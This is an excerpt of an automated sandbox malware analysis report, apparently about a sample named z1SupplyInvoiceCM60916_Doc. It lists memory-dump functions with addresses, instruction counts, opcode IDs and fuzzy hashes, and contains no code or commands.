                                                                                                                                • Instruction ID: a73b6e0ceeae27a3068a9400c6c1adf3fb0bb37b66932eefced177091554f87a
                                                                                                                                • Opcode Fuzzy Hash: 3c789e6569c780a36f7740ae573b44e677a8d28900b05b280d318a59104278c5
                                                                                                                                • Instruction Fuzzy Hash: EA012635604B219BCB318F99EC40A327BA4EF55770704C62DFE998B281C731D401CBA0
                                                                                                                                Function 017D4940 Relevance: .1, Instructions: 52COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 3aa8352d21504409645d1e377c82fa36c7ad44a6f58fb2a7fc0ac6bea989e970
                                                                                                                                • Instruction ID: eece90d06cd5b907cd939ff715d347b8dfbdfb04b7f5afeda73ebe393426707a
                                                                                                                                • Opcode Fuzzy Hash: 3aa8352d21504409645d1e377c82fa36c7ad44a6f58fb2a7fc0ac6bea989e970
                                                                                                                                • Instruction Fuzzy Hash: 120145335412059FC332DF1EC844E12FBB8EB81770B254265E9AA9B5AAE730EC01CBC0
                                                                                                                                Function 0177E1D0 Relevance: .1, Instructions: 51COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 5965993aa4ce8ddc20320f4189e16413a02a8f28534ce97c085479aab226fbe1
                                                                                                                                • Instruction ID: 35df96cc259612313d1af53a4f382ce2ec42940904ae87bad46a781c982b4bb2
                                                                                                                                • Opcode Fuzzy Hash: 5965993aa4ce8ddc20320f4189e16413a02a8f28534ce97c085479aab226fbe1
                                                                                                                                • Instruction Fuzzy Hash: 5211CB32241601EFCB26AF09C880F06BBB8FF58B44F2000A8EA058B6A1C631ED01CA90
                                                                                                                                Function 01706259 Relevance: .1, Instructions: 51COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 09e87c1217c78027db69dc26d2eeafff44ed387867a92b83bfca19bba76b26eb
                                                                                                                                • Instruction ID: 6f7c75bc1a0d11d42ef2685a7998a6657fa8432e817fa6834c045231f8cd6ed3
                                                                                                                                • Opcode Fuzzy Hash: 09e87c1217c78027db69dc26d2eeafff44ed387867a92b83bfca19bba76b26eb
                                                                                                                                • Instruction Fuzzy Hash: DE119A70641229ABDB26EF24CC56FE9B3B4AF04720F5041D4B318A60E5EB309E91CF84
                                                                                                                                Function 01786050 Relevance: .0, Instructions: 50COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 8a9e9df10f6a731dedff75217ba08f67ee0009a6fa07441a9b85d0efc2efd84d
                                                                                                                                • Instruction ID: 99b660a1ae438a3fe193cb3d138b3918e186e86c69de24a3b057d66003f2526c
                                                                                                                                • Opcode Fuzzy Hash: 8a9e9df10f6a731dedff75217ba08f67ee0009a6fa07441a9b85d0efc2efd84d
                                                                                                                                • Instruction Fuzzy Hash: BB111776900019BBCB16EB94CC84EDFBB7DEF48254F044166A906E7211EA34AA55CBE0
                                                                                                                                Function 0170208A Relevance: .0, Instructions: 50COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: cec1b93156338fd1fb8a58b034706470ae4e768dca4fd24834b6fe138f7a55f1
                                                                                                                                • Instruction ID: 460c8f8bcd715e79abea9c1efeedec6c980f266c6fffe6c71da83181a7476328
                                                                                                                                • Opcode Fuzzy Hash: cec1b93156338fd1fb8a58b034706470ae4e768dca4fd24834b6fe138f7a55f1
                                                                                                                                • Instruction Fuzzy Hash: EF01F533200310CBDF52CA2DD888A52F7ABBFC4610F5544A5ED458F29BDAB1C881C3A0
                                                                                                                                Function 01796500 Relevance: .0, Instructions: 50COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 4da73f909de50b1ebd94f7f583694f997c96623439c4d5e9d044aff3771d574e
                                                                                                                                • Instruction ID: 026ba98c6c26508fb022e9b0c12688bfe7abe1b8e5c2b88edc62304ceccd665d
                                                                                                                                • Opcode Fuzzy Hash: 4da73f909de50b1ebd94f7f583694f997c96623439c4d5e9d044aff3771d574e
                                                                                                                                • Instruction Fuzzy Hash: C311E5726001459FC701CF18E400BA2FBB5FB5A314F188259F8448B315D731EC84CBA0
                                                                                                                                Function 0178C810 Relevance: .0, Instructions: 50COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 7ae47875e09254b16e5e2bc3777a8ed709695807652362966965de626962a3c4
                                                                                                                                • Instruction ID: 2359c43f7abcd868d2b6fe4401b95d1d5dee215014c13ee12a98092c576784aa
                                                                                                                                • Opcode Fuzzy Hash: 7ae47875e09254b16e5e2bc3777a8ed709695807652362966965de626962a3c4
                                                                                                                                • Instruction Fuzzy Hash: 9E1118B1A102099FCB00DFA9D545AAEFBF8FF58250F10806AA905E7355D674EA018BA4
                                                                                                                                Function 017AEA60 Relevance: .0, Instructions: 50COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: ff130ef6a3765a8cd5ddb81e46fb429191e75d9bb116d6a317cb54d8315ceccb
                                                                                                                                • Instruction ID: 7ed7d3beeeeb24908fd659ce8eae808a3f89190dfc8037297915bb170ae15b82
                                                                                                                                • Opcode Fuzzy Hash: ff130ef6a3765a8cd5ddb81e46fb429191e75d9bb116d6a317cb54d8315ceccb
                                                                                                                                • Instruction Fuzzy Hash: CA0124311402119BCB32AF298494D37FBBAFFD16A0BA4446EF2110B215CF30EE81CB90
                                                                                                                                Function 016FC020 Relevance: .0, Instructions: 49COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: dec391378cc995e4bcc1589e6a6118842a70016cea674f56f99eea4ad8bc76d4
                                                                                                                                • Instruction ID: ce31bef99e60d8c210d65c3b518c43c42512d722a1590ee486167d415e07bb73
                                                                                                                                • Opcode Fuzzy Hash: dec391378cc995e4bcc1589e6a6118842a70016cea674f56f99eea4ad8bc76d4
                                                                                                                                • Instruction Fuzzy Hash: D60128321007099FEB3296ADC804EA7F7E9FFC5214F14481DEA468B544DBB1E443C760
                                                                                                                                Function 017420F0 Relevance: .0, Instructions: 49COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 506072d6d1fb6cac77647e935b1e246573740e0cd84ad41199b1496e59d181c8
                                                                                                                                • Instruction ID: bb66d60d162dc3bd299b4ca15a567c995fdf2a8ccd4b8b3aaf77043c7958bfe0
                                                                                                                                • Opcode Fuzzy Hash: 506072d6d1fb6cac77647e935b1e246573740e0cd84ad41199b1496e59d181c8
                                                                                                                                • Instruction Fuzzy Hash: 1E116D35A0120DAFDF05EFA4D854FAEBBB5EB44250F004099F90297254E735AE11CB90
                                                                                                                                Function 0173E5CF Relevance: .0, Instructions: 49COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 7b3c0b2ab9f67562d8d60b5b2e1966a9a41805542256ff6aec95c667c0334eb6
                                                                                                                                • Instruction ID: 51f546a201763b02d6b2953f51b2c85b303c15d41cce1f483c03311d3630d08f
                                                                                                                                • Opcode Fuzzy Hash: 7b3c0b2ab9f67562d8d60b5b2e1966a9a41805542256ff6aec95c667c0334eb6
                                                                                                                                • Instruction Fuzzy Hash: 1C0184713416117BD711BB7DCD84E57F7ACFB95664B100529B60583659DB24EC01C6A0
                                                                                                                                Function 017969C0 Relevance: .0, Instructions: 49COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 21da752a0f5cecb02ee4aad452077244d60c0315493f1548207f714593776a84
                                                                                                                                • Instruction ID: 33efb44a57ccfdd1344ce9751ad6c5d2e7cb3f027c20fe83930f1120227613dd
                                                                                                                                • Opcode Fuzzy Hash: 21da752a0f5cecb02ee4aad452077244d60c0315493f1548207f714593776a84
                                                                                                                                • Instruction Fuzzy Hash: C701FC322242129BC720DF6ED848967FBA9FF54660F514229F95987180E7349A05C7D1
                                                                                                                                Function 0178C460 Relevance: .0, Instructions: 48COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 8a2b2f99c5d901affdee927b0e14ba4697b7b77b4e0aa8e1dfdd0daf7027f9e2
                                                                                                                                • Instruction ID: 1944128b12ee6ea9365ae9820234dc0c26cc29b2483ef519fb4e6307596d1e60
                                                                                                                                • Opcode Fuzzy Hash: 8a2b2f99c5d901affdee927b0e14ba4697b7b77b4e0aa8e1dfdd0daf7027f9e2
                                                                                                                                • Instruction Fuzzy Hash: E3115B71A01209ABDB16EFA8C844EEEBBB5FB48250F004059B90597344DA34E951DBA0
                                                                                                                                Function 0178C97C Relevance: .0, Instructions: 48COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 11a4901f218f688fa5ad4c52c1101a742349edacbe9ae1236481c2288694848b
                                                                                                                                • Instruction ID: 4d0e26edefa7389ec77743e948e5e96864aa2f0b4b6e68962bf634c50d0a6fda
                                                                                                                                • Opcode Fuzzy Hash: 11a4901f218f688fa5ad4c52c1101a742349edacbe9ae1236481c2288694848b
                                                                                                                                • Instruction Fuzzy Hash: 5C1179B16183089FC700DF69C445A9BFBE4EF98310F00855EB998D7394E630E900CBA2
                                                                                                                                Function 0178CA11 Relevance: .0, Instructions: 48COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: bc045603e9196a079dd96866902ed54167caceb955d9e14155fce9c220cbf53e
                                                                                                                                • Instruction ID: 24c2a25b6451fd4778d6c72fd90901e2e03ad83dc1574019c1bf06bbcd1abdfa
                                                                                                                                • Opcode Fuzzy Hash: bc045603e9196a079dd96866902ed54167caceb955d9e14155fce9c220cbf53e
                                                                                                                                • Instruction Fuzzy Hash: DF1179B16183089FC300DF69C445A9BFBE4FF99350F00851EB998D73A4E630E900CBA2
                                                                                                                                Function 0171E016 Relevance: .0, Instructions: 46COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 0b4e63a3af2f36388c19bb01a8158bbf85eee50dbe01f6888877beb839016758
                                                                                                                                • Instruction ID: 065532f12d5529c6914f1bfbc15fe69f909a3e8548ea7849abcaa58411750351
                                                                                                                                • Opcode Fuzzy Hash: 0b4e63a3af2f36388c19bb01a8158bbf85eee50dbe01f6888877beb839016758
                                                                                                                                • Instruction Fuzzy Hash: 3E012872200684DFE327DB1DCA48F26FBE8EB45B54F1904A1FE05CB6A6DA78DC40C661
                                                                                                                                Function 016F826B Relevance: .0, Instructions: 46COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: a5d031901756b08782b4ae4f892c67b3d9a5b6469aa89dfe2459b08ea084533a
                                                                                                                                • Instruction ID: f1e7b3862e182a943884385be1b1bc2b67083ab69bfab49a2941d4cd199d594e
                                                                                                                                • Opcode Fuzzy Hash: a5d031901756b08782b4ae4f892c67b3d9a5b6469aa89dfe2459b08ea084533a
                                                                                                                                • Instruction Fuzzy Hash: 4E018F35600505DFDB14EB6ADC089AFB7ADEF81220B5580AD9A02A7784EE30E902C690
                                                                                                                                Function 017AEB50 Relevance: .0, Instructions: 46COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: InitializeThunk
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                • Opcode ID: ebb5de6d555e7c25edfcd4c36e186acfeff0556b918e2a58132376460e472ad8
                                                                                                                                • Instruction ID: 197782c4f30580af3ef38da600eccddcf1ffa7a13815811fc0075a7a0f1e8f85
                                                                                                                                • Opcode Fuzzy Hash: ebb5de6d555e7c25edfcd4c36e186acfeff0556b918e2a58132376460e472ad8
                                                                                                                                • Instruction Fuzzy Hash: F701A7712447019FD7315B1AD844F03FBA8EF95B60F11442DB7169F394D6B0A880CBA4
                                                                                                                                Function 01702582 Relevance: .0, Instructions: 45COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: ccbacd7b1f36e0ee0737c2d6b232f63222e36fb05f4f076c440e3a57ac54b7ac
                                                                                                                                • Instruction ID: b98bc7761500e21d5632f13d7ded5677066f854026d1986b23020e851d4ee0f9
                                                                                                                                • Opcode Fuzzy Hash: ccbacd7b1f36e0ee0737c2d6b232f63222e36fb05f4f076c440e3a57ac54b7ac
                                                                                                                                • Instruction Fuzzy Hash: 36F0F433A41B10BBC7329B5A8C84F47FEE9EB84BA0F104068B61597684DA30ED01CAA0
                                                                                                                                Function 0172C073 Relevance: .0, Instructions: 43COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
                                                                                                                                • Instruction ID: 352e453d508a4cddc25ed08c3c8a514227a17c1f4ba6b71a5aca2ca5cb0cc90a
                                                                                                                                • Opcode Fuzzy Hash: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
                                                                                                                                • Instruction Fuzzy Hash: 74F0C2B2A00621ABD335CF4DDC40E57FBEADBD5A80F048128E605CB224EA31DD05CB90
                                                                                                                                Function 017D634F Relevance: .0, Instructions: 43COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: e641d09f5849b9437317690fe5204cb99e8d124ede6e2a2c07e6e287a864008b
                                                                                                                                • Instruction ID: 1f52840cb8bc06ed94a5b859e0622d007642ad0872b4db37df9caa5303130a0a
                                                                                                                                • Opcode Fuzzy Hash: e641d09f5849b9437317690fe5204cb99e8d124ede6e2a2c07e6e287a864008b
                                                                                                                                • Instruction Fuzzy Hash: BD012C71A1020DABDB04DFA9D555AAEF7F8FF58314F10406AF905E7350DB74DA018BA4
                                                                                                                                Function 016FC310 Relevance: .0, Instructions: 43COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
                                                                                                                                • Instruction ID: 6b015f415f60856a066b44daf4c12596233a54b137789a5d775857d536ad57ed
                                                                                                                                • Opcode Fuzzy Hash: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
                                                                                                                                • Instruction Fuzzy Hash: A9F0F633205A279BD7321A5D8C40F2BAA9ADFD1AE4F1A043DE3099B244CA718D02A6D1
                                                                                                                                Function 017D625D Relevance: .0, Instructions: 43COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: f7e64bea9cfc2c544b0f6fd5265b04cd31a6199c59770a27b9355c5f73636c96
                                                                                                                                • Instruction ID: ef150ae3ee8ea2638c0ffc4318758cc3f07a84ce6157ac1163dd6a85634c7ccc
                                                                                                                                • Opcode Fuzzy Hash: f7e64bea9cfc2c544b0f6fd5265b04cd31a6199c59770a27b9355c5f73636c96
                                                                                                                                • Instruction Fuzzy Hash: B7017C71A1020EABCB04DFA9D445AAEF7F8EF58310F10806AF904E7354D774AA008BA0
                                                                                                                                Function 017D62D6 Relevance: .0, Instructions: 43COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 1e09e77f680446faa868f4fe2b8343ea54d9305dfb83225e13d0e71e8e0ce3d4
                                                                                                                                • Instruction ID: dd76a6cf88e57a749989dc60457d7cc00ecdaf170e1db9a40247915a5aedd6b6
                                                                                                                                • Opcode Fuzzy Hash: 1e09e77f680446faa868f4fe2b8343ea54d9305dfb83225e13d0e71e8e0ce3d4
                                                                                                                                • Instruction Fuzzy Hash: C6012C71A1020DABDB04DFA9D445AAEFBF8EF58314F50806AF915E7390DB749A018BA4
                                                                                                                                Function 0173CA6F Relevance: .0, Instructions: 42COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 6225b3f56bb7e4a8823ac3bf287c1186c08f5b75335344108ff231fc305a603f
                                                                                                                                • Instruction ID: cac5fd6370cf8c2b3d6a1ca96e6efdaf06f02d934483156fd8f201fbfb801022
                                                                                                                                • Opcode Fuzzy Hash: 6225b3f56bb7e4a8823ac3bf287c1186c08f5b75335344108ff231fc305a603f
                                                                                                                                • Instruction Fuzzy Hash: D701F432300689ABD723AB1DC80DF59FFD9EF81754F0940E6FA449B6A2D6B8C941C221
                                                                                                                                Function 017D61E5 Relevance: .0, Instructions: 41COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: db77969ada8b597ba046c05e28919609e1858c5fffcb19534c795603d95d7205
                                                                                                                                • Instruction ID: d452d437974c3ef2763a2166f5a8d973f5ac5e5a13ee7da042f620e5e42f54d6
                                                                                                                                • Opcode Fuzzy Hash: db77969ada8b597ba046c05e28919609e1858c5fffcb19534c795603d95d7205
                                                                                                                                • Instruction Fuzzy Hash: 51012C71A102599BDB04DFA9D445AAEFBB8EF58310F14405AF505A7290D774AA01CB94
                                                                                                                                Function 017863C0 Relevance: .0, Instructions: 41COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: dbb06fbea8421d8b96890fd2b120b20d820a8046168cc589f8d54c87f08ef009
                                                                                                                                • Instruction ID: 8c8e1c22019fac10b34d20a4585d5525909278caa46128a49fc343edeed8d0f1
                                                                                                                                • Opcode Fuzzy Hash: dbb06fbea8421d8b96890fd2b120b20d820a8046168cc589f8d54c87f08ef009
                                                                                                                                • Instruction Fuzzy Hash: 25F0127220001DBFEF019F94DD80DAFBB7DEB55698B104125FA1192160D631DD21A7A0
                                                                                                                                Function 0178A4B0 Relevance: .0, Instructions: 40COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 807db1a907905feedd6af5e963048d2a88b409a13410ed0f4d933e1307321de8
